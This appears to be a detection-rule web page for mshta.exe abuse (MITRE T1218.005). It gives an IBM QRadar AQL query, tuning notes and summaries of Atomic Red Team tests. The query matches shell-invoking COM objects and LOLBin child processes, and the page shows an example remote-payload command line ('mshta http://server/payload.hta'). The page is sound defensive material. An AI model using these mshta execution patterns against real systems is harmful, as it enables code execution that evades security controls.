T1218.005 IBM QRadar · QRadar

Detect Mshta in IBM QRadar

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. Mshta.exe executes Microsoft HTML Applications (HTA) files outside of the Internet Explorer browser security context, bypassing browser security settings and application control solutions. HTA files can be loaded locally, from remote URLs (mshta http://server/payload.hta), or as inline scripts (mshta vbscript:...). This technique is widely used by nation-state APTs including FIN7, Lazarus Group, APT29, APT32, MuddyWater, Kimsuky, Sidewinder, Gamaredon, and many others, making it one of the most commonly abused LOLBins for initial access and execution.

MITRE ATT&CK

Tactic
Defense Evasion
Technique
T1218 System Binary Proxy Execution
Sub-technique
T1218.005 Mshta
Canonical reference
https://attack.mitre.org/techniques/T1218/005/

QRadar Detection Query

IBM QRadar (QRadar)
sql 
SELECT
  DATEFORMAT(deviceTime, 'yyyy-MM-dd HH:mm:ss') AS "Event Time",
  LOGSOURCENAME(logsourceid) AS "Log Source",
  sourceip AS "Source IP",
  username AS "User",
  "Image" AS "Process Path",
  "CommandLine" AS "Command Line",
  "ParentImage" AS "Parent Process",
  "ParentCommandLine" AS "Parent Command Line",
  CASE WHEN LOWER("CommandLine") LIKE '%http://%' OR LOWER("CommandLine") LIKE '%https://%' THEN 1 ELSE 0 END AS "RemoteURL",
  CASE WHEN LOWER("CommandLine") LIKE '%vbscript:%' OR LOWER("CommandLine") LIKE '%javascript:%' THEN 1 ELSE 0 END AS "InlineScript",
  CASE WHEN "CommandLine" LIKE '%GetObject%' THEN 1 ELSE 0 END AS "GetObject",
  CASE WHEN "CommandLine" LIKE '%WScript.Shell%' OR "CommandLine" LIKE '%Shell.Application%' OR "CommandLine" LIKE '%CreateObject%' OR "CommandLine" LIKE '%ActiveXObject%' THEN 1 ELSE 0 END AS "ShellInvoke",
  CASE WHEN LOWER("ParentImage") LIKE '%winword.exe%' OR LOWER("ParentImage") LIKE '%excel.exe%' OR LOWER("ParentImage") LIKE '%outlook.exe%' OR LOWER("ParentImage") LIKE '%powerpnt.exe%' THEN 1 ELSE 0 END AS "OfficeParent",
  CASE WHEN LOWER("CommandLine") LIKE '%temp%' OR LOWER("CommandLine") LIKE '%appdata%' OR LOWER("CommandLine") LIKE '%downloads%' OR LOWER("CommandLine") LIKE '%desktop%' OR LOWER("CommandLine") LIKE '%public%' THEN 1 ELSE 0 END AS "HTAPath",
  CASE WHEN LOWER("ParentImage") LIKE '%\mshta.exe' AND (LOWER("Image") LIKE '%\cmd.exe' OR LOWER("Image") LIKE '%\powershell.exe' OR LOWER("Image") LIKE '%\wscript.exe' OR LOWER("Image") LIKE '%\cscript.exe' OR LOWER("Image") LIKE '%\certutil.exe' OR LOWER("Image") LIKE '%\bitsadmin.exe' OR LOWER("Image") LIKE '%\regsvr32.exe' OR LOWER("Image") LIKE '%\rundll32.exe') THEN 1 ELSE 0 END AS "SuspiciousChild"
FROM events
WHERE LOGSOURCETYPENAME(devicetype) IN ('Microsoft Windows Security Event Log', 'Sysmon')
  AND deviceTime > NOW() - 86400000
  AND (LOWER("Image") LIKE '%\mshta.exe' OR LOWER("ParentImage") LIKE '%\mshta.exe')
  AND (
    LOWER("CommandLine") LIKE '%http://%' OR
    LOWER("CommandLine") LIKE '%https://%' OR
    LOWER("CommandLine") LIKE '%vbscript:%' OR
    LOWER("CommandLine") LIKE '%javascript:%' OR
    "CommandLine" LIKE '%GetObject%' OR
    "CommandLine" LIKE '%WScript.Shell%' OR
    "CommandLine" LIKE '%Shell.Application%' OR
    "CommandLine" LIKE '%CreateObject%' OR
    "CommandLine" LIKE '%ActiveXObject%' OR
    LOWER("ParentImage") LIKE '%winword.exe%' OR
    LOWER("ParentImage") LIKE '%excel.exe%' OR
    LOWER("ParentImage") LIKE '%outlook.exe%' OR
    LOWER("ParentImage") LIKE '%powerpnt.exe%' OR
    LOWER("ParentImage") LIKE '%\mshta.exe'
  )
ORDER BY deviceTime DESC
LAST 24 HOURS
high severity high confidence

QRadar AQL query detecting T1218.005 mshta.exe abuse. Queries Sysmon event records from the events table, filtering on Image or ParentImage matching mshta.exe, then scoring each row across seven risk indicators (remote URL, inline script, COM object invocation, Office parent, writable-path HTA, suspicious child process). Results are returned only when at least one indicator fires or mshta.exe appears as a parent, preserving all evidence columns for triage.

Data Sources

Windows Security Event Log (QRadar DSM)Sysmon for Windows (QRadar DSM)Microsoft Endpoint Defense (optional enrichment)

Required Tables

events

False Positives & Tuning

  • Enterprise middleware or ERP applications (e.g. SAP GUI, legacy Oracle Forms wrappers) that use HTA scaffolding and call COM objects such as Shell.Application for file-open dialogs or CreateObject for data exchange — these will score highly on ShellInvoke despite being benign
  • Software deployment tooling that stages HTA installer UIs into %APPDATA% or %TEMP% as part of a sanctioned software delivery pipeline, triggering the HTAPath indicator
  • Penetration testing or red team exercises with explicit authorisation that use mshta.exe as a test vector; confirm against change management records before escalating
Download portable Sigma rule (.yml)

Other platforms for T1218.005

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Mshta Remote HTA Execution

    Expected signal: Sysmon Event ID 1: mshta.exe with URL in command line. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:8080. Sysmon Event ID 22 (DNS Query) if a domain was used instead of IP. Security Event ID 4688.

  2. Test 2Mshta Inline VBScript Execution

    Expected signal: Sysmon Event ID 1: mshta.exe with 'vbscript:' and 'CreateObject' in command line. Sysmon Event ID 1: cmd.exe as a child of mshta.exe. Sysmon Event ID 11: File created at temp path. Security Event ID 4688 for both processes.

  3. Test 3Mshta Launched from Office Application Path

    Expected signal: Sysmon Event ID 1: cmd.exe, then mshta.exe with vbscript: and Execute in command line. InlineScript, GetObject/ShellInvoke indicators fire. If the obfuscated CreateObject resolves, WScript.Shell child process spawns calc.exe as grandchild of mshta.

Last updated: 2026-04-13 Research depth: deep
References (7)

Unlock Pro Content

Get the full detection package for T1218.005 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1218System Binary Proxy Execution

Related Sub-techniques

T1218.001Compiled HTML FileT1218.002Control PanelT1218.003CMSTPT1218.004InstallUtilT1218.007MsiexecT1218.008OdbcconfT1218.009Regsvcs/RegasmT1218.010Regsvr32T1218.011Rundll32T1218.012VerclsidT1218.013MavinjectT1218.014MMCT1218.015Electron Applications

Related Techniques

T1218System Binary Proxy ExecutionT1566.001Spearphishing AttachmentT1059.005Visual BasicT1059.007JavaScriptT1204.002Malicious FileT1105Ingress Tool TransferT1071.001Web ProtocolsT1218.001Compiled HTML File

Same Tactic: Defense Evasion

Popular Detections